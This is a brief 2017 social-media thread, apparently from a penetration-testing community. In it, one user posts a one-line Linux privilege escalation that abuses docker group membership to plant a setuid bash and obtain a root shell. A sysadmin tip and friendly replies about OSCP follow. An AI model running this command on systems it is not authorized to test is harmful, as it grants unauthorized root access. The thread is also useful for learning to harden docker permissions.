zacharykeetonApr 17, 2017

HACKER TIP: If you pop a low-priv linux shell. Don't forget to check if the user is in the "docker" group. If so, a root shell is only one line away:

$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

screenshots and more here on my (crappy) blog: http://zacharykeeton.com/Linux_Privilege-Escalation-with-Docker/

SysAdmin tip: Don' t add any nonsudoers to the 'docker' group!

Show threadRoyal Rivera:tophat:
@zacharykeeton Considering i know where envy is from... You should probably redact the name ;) OSCP can revoke your admission/certificate for something like this
Apr 17, 2017 at 6:22pmWeb
Show threadzacharykeetonApr 17, 2017
@r4stl1n lol... thanks but, nah it's my own HP envy. Plus, I haven't seen anything as new as docker running on any oscp lab machines.
Show threadRoyal Rivera:tophat: Apr 17, 2017
@zacharykeeton Lol ok making sure brother! Also awesome trick..ill add it to my back pocket :)
Show threadzacharykeetonApr 17, 2017
@r4stl1n thanks for looking out :wink: